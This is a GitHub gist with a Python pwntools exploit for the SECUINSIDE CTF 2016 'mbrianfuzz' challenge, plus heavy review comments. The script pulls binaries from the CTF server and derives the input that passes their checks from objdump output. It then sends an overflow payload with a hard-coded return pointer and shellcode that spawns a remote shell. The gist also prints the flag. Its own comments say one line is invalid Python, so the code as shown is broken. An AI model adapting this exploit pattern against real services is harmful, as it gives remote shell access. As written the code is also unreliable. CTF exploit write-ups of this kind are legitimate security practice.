@L4ys
Created July 11, 2016 19:41
exploit of SECUINSIDE CTF 2016 - mbrianfuzz
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from commands import getoutput
# Make pwntools assemble for x86-64; asm() and shellcraft.sh() later in the
# script read this setting.
context.arch = "amd64"
# flag: E_gut_do_nuff_hae_bo_shi_ji
def aeg(binary):
    """Build the 324-byte input for *binary* from its objdump disassembly.

    Two objdump/grep pipelines are run on the file:

    * ``cmp`` lines that sit directly before a ``jne`` and carry a ``,0x``
      immediate. The text after the last comma is parsed as hex, the first
      two matches are skipped, and the rest is grouped in threes with each
      group reversed.
    * ``movzx`` lines containing ``rip+0x20``. The second-to-last
      space-separated field is parsed as hex and 0x606080 is subtracted to
      get an index into the buffer (presumably 0x606080 is where the binary
      keeps the decoded input -- confirm against the challenge binary). The
      indices are grouped in fours, each group reversed, and the final group
      dropped.

    Both lists must hold exactly 80 groups. For every group the three
    constants are stored at the first three indices and 0x7f at the fourth.

    *binary* is interpolated unquoted into a shell pipeline, so it has to be
    a path the caller controls. Python 2 only (``commands.getoutput``,
    ``bytearray`` built from ``str``).
    """
    # Immediates of the cmp instructions that guard each jne.
    cmp_cmd = "objdump -M intel -d %s | grep jne -B 1 | grep cmp | grep ,0x" % binary
    constants = []
    for cmp_line in getoutput(cmp_cmd).split("\n")[2:]:
        constants.append(int(cmp_line.split(",")[-1], 16))
    args = [triple[::-1] for triple in group(3, constants)]
    assert len(args) == 80

    # Four buffer indices read by each check function.
    movzx_cmd = "objdump -M intel -d %s | grep movzx | grep rip+0x20" % binary
    offsets = []
    for movzx_line in getoutput(movzx_cmd).split("\n"):
        offsets.append(int(movzx_line.split(" ")[-2], 16) - 0x606080)
    idx = [quad[::-1] for quad in group(4, offsets)][:-1]
    assert len(idx) == 80

    buf = bytearray("\x00" * 324)
    for n in range(80):
        positions, values = idx[n], args[n]
        # Same write order as the checks are listed: three constants, then 0x7f.
        for k in range(3):
            buf[positions[k]] = chr(values[k])
        buf[positions[3]] = chr(0x7f)
    return buf
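def from_remote(binary):
    """Fetch the next challenge binary from the CTF server into *binary*.

    Connects to chal.cykor.kr:20002, waits for the server banner, reads the
    base64 text that follows up to the first blank line, decodes it and
    writes the result to *binary*, then marks the file executable.

    The file content is chosen by the remote server, and exploitable() later
    runs that file on this machine under ltrace, so the script should only
    be run inside a disposable VM or container.

    Returns the still-open pwntools connection; the caller sends the payload
    on it and is responsible for closing it.
    """
    r = remote("chal.cykor.kr", 20002)
    #r = remote("52.78.11.234", 20002)
    r.recvuntil("SEND ME YOUR STRING TO EXPLOIT BRAND NEW BINARY (HEX ENCODED)\n")
    # Python 2 "base64" str codec; the banner's "HEX ENCODED" refers to the
    # reply the server expects, not to this download.
    b = r.recvuntil("\n\n", drop=True).decode("base64")
    with open(binary, "wb") as f:
        f.write(b)
    # Set the mode directly instead of running `chmod +x` through a shell:
    # the path is never parsed as a command line, and the downloaded
    # executable is usable by the owner only.
    os.chmod(binary, 0o700)
    return r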
def exploitable(binary, payload):
    """Return True if a local run of *binary* on *payload* shows a memcpy call.

    The binary is executed on this machine under ``ltrace -e memcpy`` with
    one argument: the hex encoding of *payload* followed by 100 ``"A"``
    bytes. The result is whether the string "memcpy" occurs anywhere in the
    combined output (presumably the binary only reaches memcpy once every
    input check has passed -- confirm against the challenge binary).

    *binary* is placed unquoted into a shell command line, and in remote
    mode it is a file downloaded from the server, so this call runs
    untrusted code locally.
    """
    probe = enhex(str(payload) + "A" * 100)
    trace = getoutput("ltrace -e memcpy %s %s" % (binary, probe))
    return "memcpy" in trace
# Driver loop: obtain a binary, derive its input with aeg(), check it locally
# with exploitable(), then deliver the payload.
# NOTE(review): the listing lost its leading whitespace; the nesting below is
# reconstructed from the control flow and should be checked against the
# original gist.
total_try = 0  # binaries analysed so far
exploitable_try = 0  # binaries for which exploitable() returned True
local = False  # set when a binary path is given on the command line
while True:
    if len(sys.argv) == 2:
        # Local mode: analyse the file named on the command line, no network.
        local = True
        binary = sys.argv[1]
    else:
        # Remote mode: download a fresh binary from the server into ./bin.
        binary = "./bin"
        r = from_remote(binary)
    buf = aeg(binary)
    total_try += 1
    # Reconnect for a new binary until the local ltrace check passes.
    while not exploitable(binary, buf):
        log.warn("unexploitable: %d/%d" % ( total_try - exploitable_try, total_try ) )
        if local:
            # There is no other binary to fetch in local mode.
            exit()
        total_try += 1
        r.close()
        r = from_remote(binary)
        buf = aeg(binary)
    exploitable_try += 1
    log.success("exploitable! %d/%d" % (exploitable_try, total_try))
    # Payload layout: the 324 bytes from aeg(), 10 + 24 filler bytes, an
    # 8-byte little-endian pointer, then the shellcode.
    payload = str(buf) + "A" * 10
    payload += "A" * 24
    # 0x6061EE == 0x606080 + 324 + 10 + 24 + 8, i.e. the position of the
    # bytes that follow this pointer if the decoded input is stored at
    # 0x606080 (the base subtracted in aeg) -- TODO confirm. Presumably this
    # depends on the binary loading at a fixed address with that memory
    # executable; PIE/ASLR or a non-executable data segment would invalidate
    # the hard-coded value.
    payload += p64(0x6061EE)
    # NOTE(review): not valid Python as written -- an augmented assignment
    # cannot contain a second `=`, so the script does not parse until this
    # line is corrected.
    payload += sc = asm(shellcraft.sh())
    payload = enhex(payload)
    if not local:
        log.success("Spawning a shell...")
        r.recvuntil(">>> ")
        r.sendline(payload)
        # Probe with a harmless command to see whether anything answers.
        r.sendline("id")
        res = r.recvrepeat(1)  # collect whatever arrives, 1 second timeout
        if res:
            print res
            r.interactive()
            exit()
        # No output: drop the connection and start over with a new binary.
        log.warn("No response QQ")
        r.close()
    else:
        # Local mode: run the binary through a shell with the hex payload as
        # its argument. `binary` comes from argv and is interpolated unquoted.
        os.system("%s %s" % (binary, payload))
        exit()